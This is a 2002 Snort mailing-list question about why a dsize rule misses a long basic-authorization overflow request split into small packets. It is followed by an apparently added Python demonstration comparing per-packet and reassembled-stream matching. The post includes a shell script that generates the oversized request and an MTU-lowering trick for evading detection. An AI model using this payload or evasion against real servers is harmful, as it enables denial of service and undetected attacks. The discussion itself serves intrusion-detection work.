Snort mailing list archives

stream reassemble and dsize


From: Holger.Woehle () arcor net
Date: Tue, 1 Oct 2002 09:38:01 +0100

Hello,
I have a question about stream reassembling and dsize:
Am I right that dsize only looks at the current packet, not at the whole
reassembled stream?
Why I ask:
There is an exploit in an older Apache called "Authorization:Basic", but this
problem applies to all attacks dealing
with such buffer overflows like "too long URL", "too long POST" a.s.o.

Sample attack:

#!/bin/sh
echo -n "GET / HTTP/1.0"
echo -n $'\n'"Authorization: Basic"
count=0
fillin=2048
while [ "$count" -lt $fillin ]
do
     echo -n "X"
     let "count+=1"
done
echo -n $'\r'$'\n'$'\r'$'\n'

Piping this to netcat, Snort recognises the attack with the standard rule in
web-misc.rules. This applies to snort-1.8 and snort-1.9.
Now the attacker sets his ethernet MTU to 100 (ifconfig eth0 mtu 100) and starts
the attack a second time.
Now Snort, neither 1.8 nor 1.9 (the rule handling differs; see A+ versus the
flow:established keywords), detects the scan.
snort 1.8 rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC long basic authorization string"; flags:A+;
content:"Authorization\: Basic "; nocase; dsize:>1000; classtype:attempted-dos;
reference:bugtraq,3230; sid:1260; rev:5;)

snort 1.9 rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC long basic authorization string"; flow:to_server,established;
content:"Authorization\: Basic "; nocase; dsize:>1000; classtype:attempted-dos;
reference:bugtraq,3230; sid:1260; rev:5;)
I think this is why dsize only sees packets with dsize under 100 in that
case.
If I set the MTU to 1000, both Snorts detect the scan.
I screwed around a little with stream4 parameters, but nothing helps.
How can I detect such an attack?

with regards
Holger
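The question above comes down to where the rule options are evaluated: per TCP segment or on the reassembled payload. The following Python script is an added illustration, not code from the post or from Snort, and it does not model Snort or stream4 internals. It constructs a request in the shape of the post's sample (basic-auth header padded to 2048 bytes), splits it into segments of a chosen size to stand in for a small interface MTU, and applies the two options from sid:1260 (case-insensitive content match and dsize > 1000) once per segment and once on the reassembled stream. The request bytes, segment sizes and function names are all constructed for this example.

```python
"""
Per-packet dsize versus stream-level length check.

Constructed example, not from the mailing-list post and not Snort code.
`per_packet_detect` models a dsize test that only ever sees one segment;
`per_stream_detect` applies the same test after reassembly.
"""

# Rule options taken from sid:1260 in the post: content with nocase, dsize:>1000.
RULE_CONTENT = b"authorization: basic "   # compared against lower-cased data
RULE_DSIZE_MIN = 1000                      # dsize:>1000


def build_request(fill: int = 2048) -> bytes:
    """Constructed request in the shape of the post's sample: a basic-auth
    header followed by `fill` padding bytes (the post uses 2048)."""
    return (b"GET / HTTP/1.0\n"
            b"Authorization: Basic " + b"X" * fill + b"\r\n\r\n")


def segment(payload: bytes, mss: int) -> list:
    """Split a stream payload into segments of at most `mss` bytes, the way a
    small MTU would (constructed; no real TCP stack is involved)."""
    if mss <= 0:
        raise ValueError("segment size must be positive")
    return [payload[i:i + mss] for i in range(0, len(payload), mss)]


def rule_matches(data: bytes) -> bool:
    """Both rule options evaluated against a single buffer: the content must be
    present (case-insensitively) AND the buffer must be longer than 1000 bytes."""
    return RULE_CONTENT in data.lower() and len(data) > RULE_DSIZE_MIN


def per_packet_detect(segments: list) -> bool:
    """Per-packet evaluation: every option must hold within the same segment,
    so a payload spread over many small segments never satisfies dsize."""
    return any(rule_matches(s) for s in segments)


def per_stream_detect(segments: list) -> bool:
    """Stream-level evaluation: reassemble first, then apply the rule."""
    return rule_matches(b"".join(segments))


def compare(mss: int) -> dict:
    """Run both strategies on the constructed request segmented at `mss`."""
    segs = segment(build_request(), mss)
    return {
        "segments": len(segs),
        "largest": max(len(s) for s in segs),
        "per_packet": per_packet_detect(segs),
        "per_stream": per_stream_detect(segs),
    }


if __name__ == "__main__":
    # 60-byte segments stand in for the post's MTU-100 run; 1460 for a normal
    # Ethernet link; 4096 leaves the request in one piece.
    for mss in (60, 1460, 4096):
        print(f"mss={mss:<5} {compare(mss)}")
```

With 60-byte segments the content string and the length threshold are never satisfied by the same segment, so the per-packet check stays silent while the stream-level check fires; with 1460-byte segments the first segment alone carries the header and exceeds 1000 bytes, so both agree. The length that matters for the evasion is therefore the size of the buffer the rule option is evaluated against, not the size of the request.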

